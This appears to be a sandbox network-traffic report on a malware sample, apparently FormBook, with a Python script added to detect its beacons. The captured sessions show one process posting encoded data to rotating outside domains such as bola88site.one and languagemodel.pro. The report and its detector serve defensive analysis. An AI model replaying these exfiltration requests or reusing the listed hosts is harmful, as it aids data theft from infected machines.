                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        10 | 192.168.2.4 | 49979 | 172.96.191.39 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:34:54.475677967 CEST | 838 | OUT | POST /3qit/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.bola88site.one
                                                                        Origin: http://www.bola88site.one
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.bola88site.one/3qit/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 33 32 59 36 74 4b 35 39 2f 63 43 7a 34 74 7a 4b 39 38 71 6c 31 6f 69 31 6b 45 72 42 4f 42 34 66 49 3d
                                                                        Data Ascii: -NnllVvH=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+x32Y6tK59/cCz4tzK98ql1oi1kErBOB4fI=
                                                                        Oct 8, 2024 16:34:55.389796972 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Tue, 08 Oct 2024 14:34:55 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        11 | 192.168.2.4 | 49990 | 172.96.191.39 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:34:57.036194086 CEST | 10920 | OUT | POST /3qit/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.bola88site.one
                                                                        Origin: http://www.bola88site.one
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.bola88site.one/3qit/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 39 39 78 6b 36 4c 50 69 35 44 6c 68 54 43 46 59 46 5a 6e 4f 58 61 4c 51 77 74 77 4c 6f 6b 78 6e 4a 37 6d 47 78 31 79 79 43 58 6d 4b 62 4c 64 57 52 4a 6b 50 74 64 77 7a 62 2f 77 6f 65 78 51 77 61 65 6d 76 79 65 56 73 43 39 37 79 43 30 52 6a 38 35 51 53 6a 78 35 4d 68 4c 50 5a 47 52 73 4f 51 5a 37 64 4b 2b 43 43 53 69 4b 46 79 76 73 76 76 5a 35 58 74 32 62 2f 68 6c 39 4c 61 5a 4c 4a 55 6a 66 44 6f 43 63 57 36 5a 46 6e 39 67 6b 33 69 77 74 48 49 4d 64 59 51 51 6d 4b 45 49 58 [TRUNCATED]
                                                                        Data Ascii: -NnllVvH= [TRUNCATED]
                                                                        Oct 8, 2024 16:34:58.160095930 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Tue, 08 Oct 2024 14:34:57 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.2.4 | 50009 | 172.96.191.39 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:34:59.613439083 CEST | 557 | OUT | GET /3qit/?-NnllVvH=t3sSYQcRGIG2xp6hThC36NAa5pulFT6rmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYRx0f6/FSPt3YGxqpBfNEWUCZ6CvMlkEJ/uE=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.bola88site.one
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:35:00.539025068 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Tue, 08 Oct 2024 14:35:00 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
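Sessions 9 to 12 above, and the languagemodel.pro sessions that follow, share one request shape regardless of destination: the same Internet Explorer 8 / Windows NT 5.1 User-Agent, a short random path (/3qit/, /nxfn/), a form body or query string holding a single parameter with a fixed random name (-NnllVvH) and a base64-looking value, an Origin and Referer that point back at that same path, and POSTs of 205, 225 and 10305 bytes to each host before the process (PID 2844) moves to the next domain. The servers answer 404 or 501, which is consistent with decoy domains in a FormBook configuration rather than a live C2. The Python below is an added example written for this report, not code from Joe Sandbox or from the sample; it parses requests transcribed from sessions 9, 12 and 13 (headers not needed for the checks omitted) plus one constructed benign browser request, scores each request against those indicators, and flags a parameter name reused against several hosts from one PID. The exact User-Agent match, the path pattern and the "two or more hosts" threshold are assumptions drawn from this capture, not published FormBook signatures.

```python
import re
from dataclasses import dataclass, field

# User-Agent carried by every beacon in the sessions above. Assumption: used here as an
# exact-match indicator; it is paired with the structural checks below, not used alone.
UA_SEEN = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; "
           ".NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)")

# Constructed sample input: (PID, raw request) pairs transcribed from sessions 9, 12 and 13,
# with the Accept*/Connection/Cache-Control headers dropped, plus one constructed benign request.
SAMPLE_SESSIONS = [
    (2844, "POST /3qit/ HTTP/1.1\r\n"
           "Host: www.bola88site.one\r\n"
           "Origin: http://www.bola88site.one\r\n"
           "Content-Type: application/x-www-form-urlencoded\r\n"
           "Content-Length: 205\r\n"
           "Referer: http://www.bola88site.one/3qit/\r\n"
           f"User-Agent: {UA_SEEN}\r\n\r\n"
           "-NnllVvH=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUIMjfko1ltN5+kenbhEZsxTFF9k+0+CVZw=="),
    (2844, "GET /3qit/?-NnllVvH=t3sSYQcRGIG2xp6hThC36NAa5pulFT6rmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYRx0f6/FSPt3YGxqpBfNEWUCZ6CvMlkEJ/uE=&e6mhx=LZwxPLrhqt_8A HTTP/1.1\r\n"
           "Host: www.bola88site.one\r\n"
           f"User-Agent: {UA_SEEN}\r\n\r\n"),
    (2844, "POST /nxfn/ HTTP/1.1\r\n"
           "Host: www.languagemodel.pro\r\n"
           "Origin: http://www.languagemodel.pro\r\n"
           "Content-Type: application/x-www-form-urlencoded\r\n"
           "Content-Length: 205\r\n"
           "Referer: http://www.languagemodel.pro/nxfn/\r\n"
           f"User-Agent: {UA_SEEN}\r\n\r\n"
           "-NnllVvH=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdEAqtYITi7ZD4JJhV9UrhjWO/hW4cWvV/g=="),
    # Constructed benign control: an ordinary page load from a different process (hypothetical host).
    (4120, "GET /index.html?lang=en HTTP/1.1\r\n"
           "Host: www.example.com\r\n"
           "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/129.0\r\n\r\n"),
]

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")       # standard base64 alphabet, optional padding
RAND_PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")      # /3qit/, /nxfn/ style paths (assumption)


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: dict = field(default_factory=dict)
    body: str = ""


def parse_request(raw: str) -> HttpRequest:
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body)


def split_form(raw: str):
    """Split k=v&k=v without percent-decoding, so '+' inside base64 values survives."""
    pairs = []
    for kv in raw.split("&"):
        if kv:
            key, _, value = kv.partition("=")
            pairs.append((key, value))
    return pairs


def looks_base64(value: str) -> bool:
    return bool(B64_RE.match(value)) and len(value) % 4 == 0


def beacon_indicators(req: HttpRequest):
    """Return the indicators a single request matches, in a fixed order."""
    hits = []
    h = req.headers
    if h.get("user-agent") == UA_SEEN:
        hits.append("ua")
    path, _, query = req.target.partition("?")
    if RAND_PATH_RE.match(path):
        hits.append("short_path")
    if req.method == "POST":
        pairs = split_form(req.body)
        if (h.get("content-type") == "application/x-www-form-urlencoded"
                and len(pairs) == 1 and looks_base64(pairs[0][1])):
            hits.append("single_b64_field")
        origin, referer, host = h.get("origin", ""), h.get("referer", ""), h.get("host", "")
        # The beacon pretends to be a form submitted from the very page it posts to.
        if host and origin == f"http://{host}" and referer == origin + path:
            hits.append("self_referer")
    elif req.method == "GET":
        pairs = split_form(query)
        if len(pairs) == 2 and looks_base64(pairs[0][1]):
            hits.append("b64_query")
    return hits


def is_beacon(req: HttpRequest) -> bool:
    hits = set(beacon_indicators(req))
    return "ua" in hits and "short_path" in hits and bool(hits & {"single_b64_field", "b64_query"})


def correlate(sessions):
    """Map (pid, parameter name) to the distinct hosts it was sent to; keep names reused
    against two or more hosts, the decoy-domain rotation visible in the sessions above."""
    seen = {}
    for pid, raw in sessions:
        req = parse_request(raw)
        _path, _, query = req.target.partition("?")
        pairs = split_form(req.body if req.method == "POST" else query)
        if pairs:
            seen.setdefault((pid, pairs[0][0]), set()).add(req.headers.get("host"))
    return {key: sorted(hosts) for key, hosts in seen.items() if len(hosts) >= 2}


def scan(sessions):
    """Per-request verdicts (pid, host, method, is_beacon) plus the cross-host correlation."""
    verdicts = []
    for pid, raw in sessions:
        req = parse_request(raw)
        verdicts.append((pid, req.headers.get("host"), req.method, is_beacon(req)))
    return verdicts, correlate(sessions)


if __name__ == "__main__":
    verdicts, reuse = scan(SAMPLE_SESSIONS)
    for v in verdicts:
        print(v)
    for (pid, name), hosts in reuse.items():
        print(f"PID {pid}: parameter {name!r} reused against {hosts}")
```

The per-request indicators are deliberately weak on their own (a short path or a base64 value is common), which is why `is_beacon` demands the User-Agent, the path shape and the encoded payload together, and why `correlate` is the stronger signal: one process reusing the same random parameter name against unrelated hosts within seconds is the rotation pattern, independent of which decoy answers.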


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.4 | 50017 | 217.70.184.50 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:05.742425919 CEST | 827 | OUT | POST /nxfn/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.languagemodel.pro
                                                                        Origin: http://www.languagemodel.pro
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 64 45 41 71 74 59 49 54 69 37 5a 44 34 4a 4a 68 56 39 55 72 68 6a 57 4f 2f 68 57 34 63 57 76 56 2f 67 3d 3d
                                                                        Data Ascii: -NnllVvH=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdEAqtYITi7ZD4JJhV9UrhjWO/hW4cWvV/g==
                                                                        Oct 8, 2024 16:35:06.383351088 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:06 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.4 | 50018 | 217.70.184.50 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:08.803767920 CEST | 847 | OUT | POST /nxfn/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.languagemodel.pro
                                                                        Origin: http://www.languagemodel.pro
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 79 39 69 6d 66 4d 52 56 53 63 6b 76 49 30 4f 4d 52 67 4d 39 50 72 73 42 33 44 46 77 79 50 78 77 49 3d
                                                                        Data Ascii: -NnllVvH=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zjy9imfMRVSckvI0OMRgM9PrsB3DFwyPxwI=
